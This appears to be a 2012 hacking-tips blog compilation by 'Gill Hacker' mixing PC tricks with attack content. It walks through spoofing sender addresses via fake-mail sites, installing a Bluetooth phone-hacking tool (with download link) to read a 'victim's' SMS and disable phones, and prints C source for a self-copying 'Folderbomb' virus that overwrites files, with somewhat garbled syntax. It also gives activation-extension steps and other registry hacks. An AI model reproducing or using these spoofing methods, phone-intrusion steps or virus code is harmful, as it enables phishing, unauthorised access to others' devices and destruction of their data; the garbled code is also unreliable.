Wednesday, 31 October 2012

How Hackers Send Fake Mails

Many time you see mails in your inbox like you HAVE WON $100000 and the surprising thing there is that the mail address is from banks like www.icici.com and www.sbi.co.in . So the question arises how it can be possible to send mail to anyone with others official email addresses.

There are many websites that can help to you send fake mails to anyone ,here are some websites listed below

www.fakemailer.net
www.fakesend.com
www.deadfake.com
www.anonymailer.net

I like anonymailer.net and deadfake.com most . So here is example I will send a mail myself with fake email address of Microsoft.com

This is the interface of the anonymailer.net
 Step1:- From Name:- Write any fake name like Bill Gates Step
 2:- From E-mail:- Fake email from the email sent. Step
 3:- To :- address whom you want to send mail Step
 4:- Subject::- Its same like the Subject like yahoo,gmail.

After write anything you want and send.here is my inbox where I am getting job from Microsoft. You can panic your friends with this a simple man having a bit knowledge about computers can be hacked through this easily.


Hacking Mobiles Through Bluetooth

Disclaimer: 

Super Bluetooth hack is great tool to play with friends but it can also be used for teasing personal information, so DO NOT COMMIT ANY CRIME WITH THIS TOOL.I do not take any responsibility in that case.

Super Bluetooth hack 2009 is one of the most downloaded Bluetooth hacking tools. Super bluetooth hack 2009 is used for mobile based Symbian operating system to hack & manage any mobiloe near you which is vulnerable to Bluetoothhacking attack.

Download : -http://www.mobicreed.com/wp-content/uploads/2009/05/ftp_btmobicreedcom.rar

How To Install Super Bluetooth Hack 2009

 1) Download to PC.
 2) Transfer it to your Bluetooth enabled mobile.
 3) Run the Installer (Remember, You must have Java enabled phone for installing i)
 4) He finds it and you will be able to run program
 5) Select the language and configure it.
 6) Click > Connection
 7) Click > Search Devices
 8) Choose the “Victim”
 9) And start managing with following hacks mentioned with Bluetooth. [Go to www.ethicalhacking.do.am for Video]

Gill Hacker‟s Suggesion:-“You can do many things like Read SMS, use & destroy music, disable phone, choose profile modes, block phone and many kiddie things that can be used for teasing your victim”

Hacking Through Wardriving

Wardriving

War driving, also called access point mapping, is the act of locating and possibly exploiting connections to wireless local area networks while driving around a city or elsewhere. 

In simple language it is a method of hacking in which a hacker with hacking tools start search for unsecured WIFI access points in his/her car and hack them to get some official or secret information.

To do war driving, you need a vehicle, a computer (which can be a laptop), a wireless Ethernet card set to work in promiscuous mode, and some kind of an antenna which can be mounted on top of or positioned inside the car. Because a wireless LAN may have a range that extends beyond an office building, an outside user may be able to intrude into the network, obtain a free Internet connection, and possibly gain access to company records and other resources. 

Some people have made a sport out of war driving, in part to demonstrate the ease with which wireless LANs can be compromised.


Here above is a car which is well equipped with the wardriving tools. 

So How we can protet ourself against wardriving

1. Don‘t broadcast your SSID. If you are broadcasting your SSID, this is the first thing a program will pickup and recognize. If you configure your router to not broadcast your SSID, it will be difficult to detect (but not impossible, for some software can sniff wireless communication, so if you are using your wireless network, the SSID can be revealed).

2. Change the default password. When you buy a router, a factory password is stored. People experienced in working with routers know the default passwords for different routers (and the make of the router can be seen by wardriver software such as netstumbler). It is important that you secure your router with a good password.

3. Encrypt your wireless communication. I can‘t stress the importance of encrypting your wireless communication enough. Enable encryption and enter a key

4. The MAC addresses that are allowed to connect to your router. This would require that you enter your router configuration and input the MAC address of each wireless card you have. This will restrict access so that only your computers can connect to the router.

5. If you configure file sharing on your computers, make sure it is password protected.

Gill Hacker‟s Suggesion:- “Except India this way of hacking is speedly emerging as big Identity stealing crime or identity theft so with these above tips wireless network users can secure their networks from wardrivers. Wireless networks are inherently insecure, and these tips will merely help you greater secure your network.



Create Virus Code In C Language

It will create folder in a folder in a folder and so on run this on your own responsibility*/ #include #include #include 
#include 
#include 
void main(int argc,char* argv[]) 
{ char buf[512]; 
int source,target,byt,done; 
struct ffblk ffblk; 
clrscr();
 textcolor(2); 
cprintf(‖————————————————————————–‖);
 printf(‖\nVirus: Folderbomb 1.0\nProgrammer:BAS 
Unnikrishnan(asystem0@gmail.com)\n‖); 
cprintf(‖————————————————————————–‖);
 done = findfirst(‖*.*‖,&ffblk,0); 
while (!done)
 { printf(‖\n‖);cprintf(‖ %s ―, ffblk.ff_name);printf(‖is attacked by ―);cprintf(‖Folderbomb‖); source=open(argv[0],O_RDONLY|O_BINARY); target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
 while(1)
 {byt=read(source,buf,512);
 if(byt>0) 
write(target,buf,byt);
 else
break; 
close(source); 
close(target); 
done = findnext(&ffblk);
 } 
getch(); 
}

Gill Hacker‟s Suggestion: - “Well I did not try this virus by my self, so try this and give me your feedback. But still I do not recommend to use this virus for bad purpose”

Hack Yahoo Messenger To Disable Ads

I am using GPRS connections from last 3 years and as you know speed given y your network provider is not much effective. And when chatting on yahoo messenger your 40% speed is consumed by the advertisements displaying at bottom and rooms. So how can we hack them to save our bandwidth . Here is a software called

Yahoo Messenger Tweaker

Yahoo! Messenger Tweaker is a free tool that hacks in to the Yahoo Messenger (Yahoo! Messenger 8 and 9) files and registry and gives you the possibility to customize your Yahoo Messenger's settings that are unavailable in the normal Yahoo! Messenger state. Yahoo! Messenger Tweaker‘s best hack is, its ability to remove the ads form the messenger. Yahoo! Messenger Tweaker also enables you to run multiple Yahoo! Messenger for multiple account login. Yahoo! Messenger Tweaker offers and to easily restore your configuration.


Download this Software from this below link 

http://download266.mediafire.com/4ljid3ejmfgg/wikilhmywji/Yahoo_Messenger_Tweaker.exe

Use Any Mobile Cam as PC Webcam

Not everyone could have webcams still now in this world so in this tutorial I will give you software which can help you to use your mobile phone’s cam as webcam to chat on yahoo or Skype.
Mobiola® Web Camera 3
Turn your camera phone into a high quality wireless (WiFi or Bluetooth) or wired (USB) web camera. Mobile phone as webcam with Mobiola® Web Camera 3
Main Functionality
 -> Transforms your mobile phone into a high-quality PC webcam.
 -> Connects mobile phone to PC using USB, WiFi (select models) and Bluetooth connectivity.
 -> Blackberry Storm supported (USB connection).
 -> Wi-Fi support for Blackberry phones.
 -> High Video transmission speed.
 -> Screen Capture functionality, when device screen can be demonstrated on PC real-time.
 -> Cool video effects. Have fun and impress your friends!
 -> Works with Skype, Yahoo, YouTube, MSN, AOL IM, ICQ and many others as standard USB webcam.
 -> Compatible with Symbian S60 and UIQ, Windows Mobile 5 and 6, Blackberry.

Mobiola Web Camera 1.0 consists of two software components:

(1) A client applicatoin that resides on the phone.

 (2) A webcam PC driver compatible with any Windows application that can receive video feeds from a web camera. Carry your webcam with you wherever you go and connect it to your laptop at anytime, no wires necessary. 

DOWNLOAD LINK : http://rapidshare.com/files/96883382/Mobiola_Webcam_2.2.smforum.net.rar

Gill Hacker‟s Suggesion:-“Using your mobile cam as webcam may be a good idea especially when you need a cam 2 cam chat in areas where only internet connection is available without webcams.”




Restore Folder Option And Task Manager

Many a times when we press Alt+Ctrl+DEL computer users face this below problem…

When you try to run Task Manager, you receive the message that „Task Manager has been disabled by the Administrator‟. And the error message seems funny !

You logged in using the Administrator account and still this error message. Strange you don‘t know how this has happened. The strange thing is that it is on the Administrator user identity that you get this problem. 

This all happens due to some malware or spyware software putting some registry restrictions so that one can‘t trace or remove them from the system startup.

Ok in this tutorials here are some softwares I suggest which help to to get back you tasmgr and regedit. 

1.USB DISK SECURITY

USB Disk Security provides 100% protection against any malicious programs trying to attack via USB storage (USB drive, USB mass storage device, flash disk, flash memory card, ipod, removable storage media and so on). Compare USB Disk Security against other antivirus solutions, you will find out its highlights: USB Disk Security provides 100% protection against any threats via USB drive, however, the majority of other products are unable even to guarantee 90% protection.

2. Task Manager Fix  

This utility enables task manager disabled by virus, trojans, and spyware. Software is a handy data safety software which allows you to safeguard your system privacy by enabling the task manager to view all the running processes in the background.

Download from: - http://www.taskmanagerfix.com/dl/download.php?id=1

Gill Hacker‟s Suggesion: -“I recommend USB disk security because it most viruses these days are spreading through removable disks. This application also help you to protect your computer from latest USB Disk viruses”

Run Games With Virtual Graphics Card

Many times we are stuck up with a system that just doesn‘t provide enough juice to run the latest game…the result being 

->You either spend a pot of money (atleast Rupees 3500 or 70$) for getting the latest graphics card.

->You just read reviews of games like Crysis , Far Cry on gamespot and feel like a dumbo ,fully knowing that your system just won‘t be able to support it.

Take heart ! Here‘s a wicked software with which you can beat 128-256 MB of graphics card requirements with a very modest 1GB DDR2 RAM.

 Cool right….so you can Virtually emulate NVIDIA GeForce TI 4600,NVIDIA GeForce FX 4900 ULTRA,ATi Radeon 8500,ATi Radeon 9800 PRO.Follow the given procedure:

 After downloading the software from this link

http://www.3dfxzone.it/files/download/emu_tnl/3danalyzer-v236.zip 

First install it

                                             You‘ll see something like
Next, click on ‗Select‘ option
 

 Select FarCry.exe

Next step,select the options as shown.Note that i have selected the VendorID as 4098 and DeviceID 20400 as i want to select the ATi Radeon 9800 PRO graphics card(use the index provided in the screen on the right). Click on Run.Doesn‘t matter even if you don‘t save the batch file.Your ready to roll ! Please note that the .exe file is to be selected from the main folder,and not the shortcut present on the desktop. 
 


For Some Heavy Requirement Games ,you need to tweak the stuff a bit.

Go to Start->Run->regedit.Then press F3 and search for hardwareinformation.memorysize.Click on the file,and modify the binary values to 00 00 00 08.This fools the system into believing that you have 128MB video RAM.Then select only the ‗emulate hw tnl caps‘ option.Do not select any other.Select ATi Radeon 9800.Click on Run.

Gill Hacker‟s Suggesion:- “Great tool this is and when I used first time I played Prince or Persia sand of Time which requires graphic card at tha time I only have Intel 965 Graphics, and with that and this software I enjoy playing many games”


Some Window 7 Cheats

As you all know Windows 7 RC3 is launched. Here‘s a little cheat sheet I made up for some of the handy new hot key combination, many of which I‘ve become quite dependent on!

From Desktop

1. Windows Key + Tab : Aero
2. Windows Key + E : Windows Explorer is launched.
3. Windows Key + R : Run Command is launched.
4. Windows Key + F : Search
5. Windows Key + X : Mobility Center
6. Windows Key + L : Lock Computer
7. Windows Key + U : Launches Ease of Access
8. Windows Key + P : Projector
9. Windows Key + T : Cycle Super Taskbar Items
10. Windows Key + S : OneNote Screen Clipping Tool
11. Windows Key + M : Minimize All Windows
12. Windows Key + D : Show/Hide Desktop
13. Windows Key + Up : Maximize Current Window
14. Windows Key + Down : Restore Down / Minimize
15. Windows Key + Left : Tile Current Window to the Left
16. Windows Key + Right : Tile Current Windows Right
17. Windows Key + # (# is any number)
18. Windows Key + = : Launches the Magnifier
19. Windows Key + Plus : Zoom in
20. Windows Key + Minus : Zooms out
21. Windows Key + Space : Peek at the desktop

From Windows Explorer

22. Alt + Up: Go up one level 
23. Alt + Left/ Right: Back/ Forward 
24. Alt + P: Show/hide Preview Pane
Taskbar modifiers
25. Shift + Click on icon: Open a new instance 
26. Middle click on icon: Open a new instance 
27. Ctrl + Shift + Click on icon: Open a new instance with Admin privileges 
28. Shift + Right-click on icon: Show window menu 
29. Shift + Right-click on grouped icon: Menu with Restore All / Minimize All / Close All, etc. 
30. Ctrl + Click on grouped icon: Cycle between the windows (or tabs) in the group

Gillhacker‟s Suggesion: - “Though some of them are there in previous “versions of Windows, Windows 7 has incorporated many of them and have started many afresh.”

Hack To Change Your IP Address

1. Click on "Start" in the bottom left hand corner of screen 
2. Click on "Run"
 3. Type in "cmd" and hit ok

 You should now be at an MSDOS prompt screen.

 4. Type "ipconfig /release" just like that, and hit "enter" 
5. Type "exit" and leave the prompt 
6. Right-click on "Network Places" or "My Network Places" on your desktop. 
7. Click on "properties

 You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

 8. Right click on "Local Area Connection" and click "properties"
 9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
 10. Click on "Use the following IP address" under the "General" tab 
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up). 
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
 13. Hit the "Ok" button here 
14. Hit the "Ok" button again 

You should now be back to the "Local Area Connection" screen.

 15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings 
17. This time, select "Obtain an IP address automatically" tongue.gif
 18. Hit "Ok" 
19. Hit "Ok" again
 20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

Tuesday, 30 October 2012

Recover Hacked Yahoo Accounts

As we are entered 2010 the hacking future is going to change with lightning speed as blackhat hackers issue a news to media that in this year there first target will be ADOBE and YAHOO. So now what more a common man can do if these companies are not safe then what about us.

Preventing hacking is not easy that is seemed so we are ready to be hacked in future without any notification. From Anil Ambani to a computer shop owner all are going to hack. So question arise here that what to do then?

Well in this article i will discuss a common problem that we often see in routine life i.e yahoo account hacking. Most of us have been hacked or going to be hacked some how. But after hacking we have no option to reclaim that account except ―alternative email address and secret question‖options. But in the below tutorial I will guide you to how to get back your hacked account by talking directly with the yahoo employees. 

Solution 1

In case of a hacked account send a mail describing your problem to account-security-help @cc.yahoo-inc.com

 Note: please delete the blank space between help and @ which I had to insert because Yahoo can't handle long addresses.

 Solution 2

 If this doesn't help, call Yahoo: 1-408-349-1572, explain to a customer service person what happened.

They will ask you to do certain things and then they compare your original info with the changed info. Within 24 hrs you should get your account back!

Many users got their hacked account back with in 30 minutes

Here is a comment from the user.

“I am very grateful! I have solved my email problem in just 30 min by calling the number I was given.

 I am very, very grateful with the person that answered my question and helped me!!! 

Thank you very much!”


GillHacker‟s Suggesion: - “Mostly after been hacked we make new ID and aging starts our life but for a big business man. So try to be safe but if you are hacked then pick up the phone and make acall to yahoo itself (Note:- The phone no is not Toll Free)

Hack P4 To Make Core2Dual Processor

Note, this trick is really not recommended as this may cause windows to provide falsified information to it self and other applications, which would cause system stability issue and may slow down the system….

 How to Change the Processor Name shown in the System properties Dialog Box ?? 

Under Windows XP, Click Start, then RUN Command, 

―regedit―… (Without the quote symbols)… Now please navigate your self to this Registry location,

 >HKEY_LOCAL_MACHINE > HARDWARE > DESCRIPTION > SYSTEM > CENTRAL PROCESSOR > GO TO 0 Now please double click, on the key PROCESSORNAMESTRING . Change the value as you like…
Here you can see I changed my processor to 8.0GHz. So go and showoff to your friends that you have 8Ghz processor he he.

Block Sites Without Costly Firewalls

If you work in a kiosk mode PC say a computer cafe or in a school setting, there are restrictions that you want to enforce when it comes to sites that users can browse. This is specially important when you have a family workstation which little kids can use. Filtering is an option but programs Procon and others can definitely affect system and browser performance. You can also use software like AnyWeblock but it is pretty complicated and time-consuming for busy users to configure. For starters here‘s a nifty way to filter those unwanted websites off your computer. For either Vista or Windows XP, go to the directory C:\Windows\System32\drivers\etc (If C is your default Windows directory). Back-up first your Hosts file in another secured directory. Next, open the Hosts file with Notepad (or any other text editor like Vim or Darkroom). Most probably the file is in Read-Only attribute so you cannot edit the Hosts file. First off, right click on Hosts, click Properties and uncheck Read-Only. Now go open and edit it in Notepad and you will see this:
Add the following on its own line in the hosts file below 127.0.0.1 localhost: 

127.0.0.1 www.orkut.com (we will use it as an example).

 Save the file and make sure you don‘t save it in txt extension but choose all files, exit notepad and make sure you check read-only attribute again in properties. Make sure you have cleared your browser history or flush the DNS cache, otherwise you will still see the blocked site. If you cleared the history, fire-up your favorite browser , You cannot access orkut but you can still access other sites. Accessing your listed site will return a Server not found error.

 Just a note, For gillhacker followers, just go to /etc/ folder and edit Hosts. In Windows 2k the directory should be

 C:\Winnt\System32\drivers\etc (if c: is the default drive) in Windows 98 and ME it is C:\Winnt if (if c: is the default drive).

In Ubuntu and other Linux distros do this in your favorite text editor echo "127.0.0.1 www.google.com‖ | sudo tee -a /etc/hosts. There is a downside if you have a very big list of blocked sites in Hosts file. It can slow down your machine. It seems to affect PCs in the 2k kernel and Vista but not the 9x Windows systems.
To avoid slowdowns, do this: Type services.msc in Run dialog box. In the new Services window scroll down to DNS Client and double-click it or just right-click and hit Properties. Click the drop-down for Start-up type then either select Manual or Disabled. Hit ok, exit the window and restart your PC.

So in this way if some one want to access www.orkut.com or any pron site in school he/she will be denied.

 Anybody with a depth knowledge in Hosts files and ports like myself, even proxy settings can bypass this technique and browse into any intended website. But what we are concerned here is the easiest way to block sites from common users without them even knowing that somebody blocked their ability to browse specific sites. It is better to have a layer of protection, than nothing at all. Now apply it, test it, and have a happy filtered browsing!

Extend Window Vista Activation

We always use Windows which demands activation after 30 days so in below article I will guide you to how to extend your Vista activation period, I do not tested it on Window 7 but I guess it will work too in Window 7.

 Ryan from Cybernet wrote a nice article days back that explains how every Windows Vista user can extend the activation period by the factor three raising the total time until Windows Vista has to be activated to 360 days. The first steps are basically the same as before. 

Run the command prompt as an administrator, you can do this by starting cmd and pressing CTRL + SHIFT + ENTER. Type ―slmgr -rearm‖ and hit return. 

The activation period will be reset to another 30 days after a reboot. To check if this procedure was successful you can type ―slmgr -xpr‖ at the same command prompt after the reboot.

 This was the usual way of extending the Windows Vista activation period from 30 to 120 days. We are now going to increase this period by the factor two again to have 360 days to activate Windows Vista. 

Open the registry with ―regedit‖ and navigate to the key HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ SL

Right-click the SkipRearm key and choose to modify it. Change the value to 1 and close regedit again. Start the command prompt as an administrator again and type ―slmgr -rearm‖ again. Reboot
the pc again and the Vista activation period was again reset to another 30 days. This can be done eight times.

 To outline it again:

-> slmgr -rearm as an administrator in the Windows Vista command prompt (3 times)


-> change SkipRearm to 1 in HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ SL


-> slmgr -rearm as an administrator in the Windows Vista command prompt (both 8 times)
This extends the Windows Vista activation period to 360 days.

How To: Jailbreak iOS 5.1.1 Untethered On iPod Touch 4G, iPod Touch 3G With Absinthe 2.0.1 [Windows]

Windows users looking to Jailbreak their iPod Touch 4G or iPod Touch 3G running the iOS 5.1.1 firmware are in luck! Pod2G recently released his Absinthe 2.0 Jailbreaking solution to Jailbreak the iPod Touch 4G and iPod Touch 3G running the iOS 5.1.1 firmware Untethered. Thus, in this how to guide you will learn how to Jailbreak your iPod Touch 4G or iPod Touch 3G running the iOS 5.1.1 firmware Untethered using the Windows version of Absinthe 2.0.1.

iPod Touch 4G/3G iOS 5.1.1 Untethered Jailbreak


Perquisites: The first thing you need to do before starting this how to is make sure your iPod Touch is backed up. As the Absinthe Jailbreaking tool was just released, there is a good chance that you may experience an error Jailbreaking it. Thus, it is always a good idea to make sure all your content on your iPod Touch is backed up.

Recommendation: It is our personal recommendation and Pod2G’s that you restore your iPod Touch to factory settings on the iOS 5.1.1 firmware. This will dramatically reduce the chance you have of experiencing an error while Jailbreaking it.
Step 1) – The first thing you will need to do is download the latest version of the Absinthe Jailbreaking tool from the iJailbreak Downloads Section or from one of the direct download links below. It is always recommend that you check the iJailbreak Download Section, however, to ensure that you are downloading the latest version (we do not always update these guides with the up-to-date versions).

DOWNLOAD  Absinthe 2.0.1 for Windows

 Step 2) – Once you have downloaded Absinthe 2.0.1 you will need to extract it to your desktop.




Step 3) – Next you will need to right click on the absinthe-win-2.0.1.exe file and then click the Run in administrator option.
 Upon doing this a terminal window will appear with lines of code flashing by. This is because Absinthe is now extracting itself properly and will appear in a new folder called absinthe-win-2.0.1 once terminal disappears.
 Go inside this newly created folder and then right click on the absinthe.exe file and then click the Run in administrator option
Step 4) – With Absinthe 2.0.1 up and running you will need to plug your iPod Touch into your computer (if you have not done this already). Upon doing this Absinthe should recognize your iPod Touch, and once this happens, you will need to click the Jailbreak button in the middle-right side of the screen.

When you click the Jailbreak button your iPod Touch will look like it is being officially restored through iTunes; it should say something along the lines of “restore in progress.”
Note: The Jailbreaking process can take anywhere from 5-minutes to 10-minutes so be patient.
Step 5) - Once your iPod Touch reboots you can slide-to-unlock it and then on your SpringBoard (homescreen) you should notice Cydia. Tap on the Cydia icon and let it prepare its filesystem. Congrats! You have just Jailbroken your iPod Touch 4G or iPod Touch 3G Untethered running the iOS 5.1.1 firmware with Absinthe 2.0.1.

Hopefully this how to guide has helped you Jailbreak your iPod Touch 4G or iPod Touch 3G running the iOS 5.1.1 firmware using Absinthe 2.0.1 on Windows. If you have any questions or thoughts related to this tutorial please leave them in the comments.